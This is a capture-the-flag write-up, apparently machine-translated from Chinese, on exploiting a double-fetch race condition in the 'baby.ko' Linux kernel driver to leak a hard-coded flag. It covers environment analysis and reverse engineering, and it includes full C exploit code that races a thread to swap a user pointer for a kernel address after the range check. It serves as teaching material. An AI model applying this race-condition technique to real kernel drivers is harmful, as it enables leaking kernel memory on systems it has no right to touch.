In fact, generally speaking, the problem is not complicated , It's a very simple conditional competition

subject

The attachment

The attachment

In fact, you only need to download .tar.gz

Attachment analysis

Don't be fooled by naming , It's just a tar


there core.cpio It's not compressed , So we just need to


Inside this exp,exp,c core.cpio, as well as fs.sh You can delete
fs.sh It's actually helping us generate cpio

analysis init

Here you can see that the driver is baby.ko, Corresponding open /dev/baby You can access , There's nothing else to say , Because it is not opened here dmesg_restrict, So we can execute dmesg see printk The content of
Pack another core.cpio

analysis start.sh

It's not turned on SMAP Protect , That is, the kernel state can directly access user state data

Here is the configuration of non single core single thread startup , Can trigger conditional competition , Under possible debugging , We add -s

Analysis driven

There are not many functions in this , The next three are useless , Mainly the top three

ioctl

I don't know what's going on here , I recognize that there is a problem ,v2 That's our third parameter

This is actually when we ioctl(fd,a2,a3) Call directly
sub_25(fd,a2,a3), So let's analyze sub_25

sub_25

Two functions

The first function is leaked flag Kernel address , What is promised here is %p, That is the flag Type the address saved inside , You can see that is aFlagThisWillbe The address of

It holds our last flag

This is the second function

chk_range_not_ok

This is actually
return shangxian<(addr+pianyi)
Let's see what the upper limit means
Here, let's have a look through debugging
Very simple test code

#include<sys/ioctl.h>
#include<fcntl.h>
#include <unistd.h>
int main(){
	int fd=open("/dev/baby",2);
	int a=2;
        ioctl(fd, 0x1337, &a);
	close(fd);
}

Here's a question , I hope a big man can answer
Generally, we find the loading address through this method , But this is obviously wrong

Through here I found the address

The modified init, because flag Hard coded in the driver , test flag I deleted it, too

rax Assignment bit current_task


rdx The value is as above , It looks like I'm familiar with , Yes, this is the highest address of the user state , So through debugging, we found that ,*(_QWORD *)(__readgsqword((unsigned int)&current_task) + 4952) It is the highest address of the user state
Then combine with the concrete if Content , To satisfy if
Instructions =0x1337
shangxian>= Incoming address +16
shangxian>=(Doward) Incoming address +*(int *) Incoming address +8
These two comparisons actually mean
What we pass in is actually the address of a structure

struct flag_object{
	long flag_addr;
	long length;
}

So the first one shangxian Comparison is to judge whether the address of the structure we pass in is user state
The second judgment is our flag Is it user mode
Because what is passed in here is a pointer , We can use conditions to compete , When he passed if after , We put the structure of flag_addr Change to kernel mode

The length should also match ,strlen barring \0, So it is 33

At the same time, it will be compared one by one flag It is not the same , The same will print , So we can only modify the pointer through conditional competition

attack

Let the cat out of the flag Address

because printk It will only be displayed in the debugging information , So we need to check after performing corresponding operations dmesg, Of course, that is dmesg_restrict=0, That is, ordinary users can also see , Then, oh, comparison plus assignment

Construct our flag Structure

Write changes flag Subfunction of

finish It's a sign , After we send enough requests in the main function, we set it to 1

exp

#include<sys/ioctl.h>
#include<fcntl.h>
#include <unistd.h>
#include<pthread.h>
#include<string.h>
#include<stdio.h>
#include<stdlib.h>
long flag_addr;
void get_kernel_flag_addr(int fd){
	ioctl(fd,0x6666, 1);
	system("dmesg|tail >/tmp/1.txt");
	FILE *fd1=fopen("/tmp/1.txt","r");
	char buf[120];
	while(fgets(buf,120,fd1)){
		if(strstr(buf,"Your flag is at")){
			char hex[17];
			strncpy(hex,buf+31,16);
			sscanf(hex,"%lx",&flag_addr);
			break;
		}
	}
	fclose(fd1);

}

struct flag_structure{
	long addr;
	long len;
};
char fake_flag[]="fake";

int finish=0;
void chang_flag_addr(struct flag_structure *s){
	while(finish==0){
	s->addr=flag_addr;// Change to kernel flag Address , Callback function 
	}
}
int main(){
	int fd=open("/dev/baby",2);
     get_kernel_flag_addr(fd);
	struct flag_structure flag;
	flag.addr=(long)fake_flag;
	flag.len=33;
	pthread_t p1;
	pthread_create(&p1, NULL,chang_flag_addr,&flag);//first parm is addr of pthread object,second set NULL,third is the callback_fun addr,fourth is the param
	for(int i=0;i<10000;i++)
	{
	 ioctl(fd, 0x1337, &flag);
	 flag.addr=(long )fake_flag;//we must modify addr to user space ,otherwith we can not  pass if check
	}	
	finish=1;
	system("dmesg|grep flag{");
	close(fd);
}